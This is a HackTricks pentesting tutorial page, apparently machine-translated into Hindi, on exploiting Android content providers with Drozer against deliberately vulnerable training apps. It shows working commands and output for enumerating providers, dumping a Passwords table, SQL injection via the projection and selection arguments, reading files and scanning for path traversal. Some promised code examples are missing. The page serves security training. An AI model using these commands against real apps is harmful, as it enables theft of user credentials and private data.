Exploiting Content Providers

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Intro

डेटा एक एप्लिकेशन से अन्य एप्लिकेशनों को अनुरोध पर एक सामग्री प्रदाता के रूप में ज्ञात घटक द्वारा प्रदान किया जाता है। इन अनुरोधों का प्रबंधन ContentResolver class विधियों के माध्यम से किया जाता है। सामग्री प्रदाता अपने डेटा को विभिन्न स्थानों पर संग्रहीत कर सकते हैं, जैसे कि डेटाबेस, फाइलें, या एक नेटवर्क पर।

Manifest.xml फ़ाइल में, सामग्री प्रदाता की घोषणा आवश्यक है। उदाहरण के लिए:

<provider android:name=".DBContentProvider" android:exported="true" android:multiprocess="true" android:authorities="com.mwr.example.sieve.DBContentProvider">
<path-permission android:readPermission="com.mwr.example.sieve.READ_KEYS" android:writePermission="com.mwr.example.sieve.WRITE_KEYS" android:path="/Keys"/>
</provider>

content://com.mwr.example.sieve.DBContentProvider/Keys तक पहुँचने के लिए READ_KEYS अनुमति आवश्यक है। यह ध्यान देने योग्य है कि /Keys/ पथ निम्नलिखित अनुभाग में पहुँच योग्य है, जो एक गलती के कारण सुरक्षित नहीं है, जहाँ डेवलपर ने /Keys को सुरक्षित किया लेकिन /Keys/ को घोषित किया।

शायद आप निजी डेटा तक पहुँच सकते हैं या कुछ कमजोरियों (SQL Injection या Path Traversal) का लाभ उठा सकते हैं।

exposed content providers से जानकारी प्राप्त करें

dz> run app.provider.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
Authority: com.mwr.example.sieve.DBContentProvider
Read Permission: null
Write Permission: null
Content Provider: com.mwr.example.sieve.DBContentProvider
Multiprocess Allowed: True
Grant Uri Permissions: False
Path Permissions:
Path: /Keys
Type: PATTERN_LITERAL
Read Permission: com.mwr.example.sieve.READ_KEYS
Write Permission: com.mwr.example.sieve.WRITE_KEYS
Authority: com.mwr.example.sieve.FileBackupProvider
Read Permission: null
Write Permission: null
Content Provider: com.mwr.example.sieve.FileBackupProvider
Multiprocess Allowed: True
Grant Uri Permissions: False

यह संभव है कि DBContentProvider तक पहुँचने के लिए URIs को “content://” से शुरू किया जाए। यह दृष्टिकोण Drozer का उपयोग करने से प्राप्त अंतर्दृष्टियों पर आधारित है, जहाँ महत्वपूर्ण जानकारी /Keys निर्देशिका में स्थित थी।

Drozer कई URIs का अनुमान लगा सकता है और कोशिश कर सकता है:

dz> run scanner.provider.finduris -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Unable to Query content://com.mwr.example.sieve.DBContentProvider/
...
Unable to Query content://com.mwr.example.sieve.DBContentProvider/Keys
Accessible content URIs:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/

आपको ContentProvider कोड की जांच भी करनी चाहिए ताकि आप क्वेरीज़ खोज सकें:

इसके अलावा, यदि आप पूर्ण क्वेरीज़ नहीं ढूंढ पा रहे हैं, तो आप जांच सकते हैं कि ContentProvider द्वारा कौन से नाम घोषित किए गए हैं onCreate विधि पर:

क्वेरी इस तरह होगी: content://name.of.package.class/declared_name

डेटाबेस-समर्थित कंटेंट प्रोवाइडर

संभवतः अधिकांश Content Providers का उपयोग डेटाबेस के लिए इंटरफेस के रूप में किया जाता है। इसलिए, यदि आप इसे एक्सेस कर सकते हैं, तो आप जानकारी निकालने, अपडेट करने, डालने और हटाने में सक्षम हो सकते हैं। जांचें कि क्या आप संवेदनशील जानकारी तक पहुँच सकते हैं या इसे अधिकार प्राधिकरण तंत्र को बायपास करने के लिए बदलने की कोशिश करें।

Content Provider के कोड की जांच करते समय देखें कि क्या फंक्शंस नामित हैं जैसे: query, insert, update और delete:

क्योंकि आप उन्हें कॉल करने में सक्षम होंगे

क्वेरी सामग्री

dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
_id: 1
service: Email
username: incognitoguy50
password: PSFjqXIMVa5NJFudgDuuLVgJYFD+8w==
-
email: incognitoguy50@gmail.com

Insert content

डेटाबेस को क्वेरी करके आप कॉलम के नाम जानेंगे, फिर, आप DB में डेटा डालने में सक्षम होंगे:

ध्यान दें कि इनसर्ट और अपडेट में आप --string का उपयोग स्ट्रिंग को इंगित करने के लिए, --double को डबल को इंगित करने के लिए, --float, --integer, --long, --short, --boolean का उपयोग कर सकते हैं

Update content

कॉलम के नाम को जानकर आप एंट्रीज़ को भी संशोधित कर सकते हैं:

Delete content

SQL Injection

SQL इंजेक्शन (SQLite) के लिए परीक्षण करना सरल है प्रोजेक्शन और चयन फ़ील्ड्स को कंटेंट प्रोवाइडर को पास करके। कंटेंट प्रोवाइडर को क्वेरी करते समय जानकारी खोजने के लिए 2 दिलचस्प तर्क हैं: --selection और --projection:

आप SQL इंजेक्शन के लिए परीक्षण करने के लिए इस पैरामीटर का दुरुपयोग करने की कोशिश कर सकते हैं:

dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')

dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "*
FROM SQLITE_MASTER WHERE type='table';--"
| type  | name             | tbl_name         | rootpage | sql              |
| table | android_metadata | android_metadata | 3        | CREATE TABLE ... |
| table | Passwords        | Passwords        | 4        | CREATE TABLE ... |

Drozer द्वारा स्वचालित SQLInjection खोज

dz> run scanner.provider.injection -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Injection in Projection:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/
Injection in Selection:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/

dz> run scanner.provider.sqltables -a jakhar.aseem.diva
Scanning jakhar.aseem.diva...
Accessible tables for uri content://jakhar.aseem.diva.provider.notesprovider/notes/:
android_metadata
notes
sqlite_sequence

फाइल सिस्टम-समर्थित सामग्री प्रदाता

सामग्री प्रदाता का उपयोग फाइलों तक पहुँचने के लिए भी किया जा सकता है:

पढ़ें फाइल

आप सामग्री प्रदाता से फाइलें पढ़ सकते हैं।

dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
127.0.0.1            localhost

पथ यात्रा

यदि आप फ़ाइलों तक पहुँच सकते हैं, तो आप पथ यात्रा का दुरुपयोग करने की कोशिश कर सकते हैं (इस मामले में यह आवश्यक नहीं है लेकिन आप "../" और समान तरकीबों का उपयोग करने की कोशिश कर सकते हैं)।

dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
127.0.0.1            localhost

Drozer द्वारा स्वचालित पथ यात्रा खोज

dz> run scanner.provider.traversal -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Vulnerable Providers:
content://com.mwr.example.sieve.FileBackupProvider/
content://com.mwr.example.sieve.FileBackupProvider

संदर्भ

HackTricks का समर्थन करें

सदस्यता योजनाएँ देखें!
हमारे 💬 Discord समूह या telegram समूह में शामिल हों या Twitter 🐦 पर हमें फॉलो करें @hacktricks_live.
हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PR सबमिट करें।

PreviousDrozer Tutorial NextExploiting a debuggeable application

Last updated 6 days ago